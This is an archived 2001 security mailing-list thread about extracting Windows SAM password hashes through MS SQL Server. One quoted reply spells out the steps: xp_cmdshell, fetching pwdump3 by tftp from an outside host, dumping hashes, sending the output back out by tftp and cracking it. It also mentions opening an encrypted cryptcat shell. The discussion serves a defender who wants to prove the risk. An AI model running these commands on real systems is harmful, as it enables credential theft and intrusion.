Re: [RE: MS SQL & NT registry]

From: Chip Andrews (chipandrews@usa.net)
Date: 11/01/01 

Message-ID: <20011101173651.16699.qmail@cpdvg203.cms.usa.net>
Date:  1 Nov 2001 12:36:51 EST
From: Chip Andrews <chipandrews@usa.net>
To: focus-ms@securityfocus.com
Subject: Re: [RE: MS SQL & NT registry]

Erik, Thanks for the plug.

David,

Not sure if you're the same chap who asked me this question a while back but
the bottom line is that if you're really interested in grabbing the hashes
from the registry I would refer you to Jeremy Allison's original pwdump source
code at

http://www.insecure.org/sploits/WinNT.passwordhashes.deobfuscation.html

or pwdump3 source code (if the box is syskey'ed) at

http://packetstormsecurity.org/Crackers/NT/pwdump3.zip

You should be able to easily code your own de-obfuscator using this code which
basically does the same thing you are attempting. Barring that, Erik's
solution is also equally effective and doesn't require a compiler or c-coding
expertise.

Chip Andrews
www.sqlsecurity.com

Erik Birkholz <erik@foundstone.com> wrote:
> David,
>
> Why not use the xp_cmdshell procedure to run commands? (xp_cmdshell 'nasty
> command')
>
> If you are "sa" this will work, if not run 'sp_helprotect' to list
> permissions and find out it you have the correct permissions.
>
> Use these commands in the Query Analyzer. You said this is on your
> "private" LAN so sniffing shouldn't be an issue.
>
> tftp -i <ip> GET pwdump3.exe pwdump3.exe
> tftp -i <ip> GET lsaext.dll lsaext.dll
> tftp -i <ip> GET pwservice.exe pwservice.exe
> pwdump3 127.0.0.1 outfile.txt
> tftp <ip> PUT outfile.txt outfile.txt
> use John the Ripper (or l0pht) to crack
>
> If you need encryption, then upload cryptcat (nc.exe encrypted) and the
> pwdump3 files. Fire yourself an encrypted shell. Run the command from
> there (pwdump3 127.0.0.1). Grab the output from the cryptcat window and
> paste into a notepad. Then crack away.
>
> That should solve your problem.
>
> Also, tell them to remove the xp_cmdshell extended stored procedure. (use
> sp_dropextendedproc 'xp_cmdshell')
>
> Oh yea, tell them to read Chip's site, www.sqlsecurity.com
>
>
> --Erik B
>
>
>
> -----Original Message-----
> From: Lynum, David [mailto:David.Lynum@elancorp.com]
> Sent: Wednesday, October 31, 2001 12:57 PM
> To: focus-ms@securityfocus.com
> Subject: MS SQL & NT registry
>
>
> Hey there,
>
> This is first time I've posed a question to this list, so take it easy on
> me.
>
> My question has to do with a whitepaper I read from ISS.net on security
> database servers, and here's the link to it,
> http://documents.iss.net/whitepapers/securingdbs.pdf. The paper shows how
to
> use an extended stored procedure call, "xp_regread" to read registry
> contents for the SAM\Domains\Accounts section. But it doesn't tell you how
> to extract the query results so that a password cracking program such as
> L0phtcrack can be used to see the account information. My question is
> specifically about extracting the contents of the SAM registry entries from
> the SQL query results so that I can import them into L0phtcrack to crack
> them. How do I do this? I've saved the query report results to a file and
> then opened that file from within L0pht, but L0pht closes as soon as I do
> this. I e-mailed support for L0pht and they haven't gotten back to me. I
> have L0pht 2.52. Also, I spoke with one of the security people at ISS
about
> this, but they won't provide any help.
>
> Have any of you done this, or know where I can find information on how to
do
> this? I need to know because I handle data security for my company and I
> have to prove to them that this exploit is real before they'll take any
> action.
>
> Thanks in advance for your help,
>
> David
>
>
> --This communication and any files transmitted with it contain information
> which is confidential and may be privileged and exempt from disclosure
under
> applicable law. It is intended solely for the use of the individual or
> entity to which it is addressed. If you are not the intended recipient, you
> are hereby notified that any use, dissemination or copying of this
> communication is strictly prohibited. If you have received this
> communication in error, please notify the sender. Thank you for your
> co-operation.--

Quantcast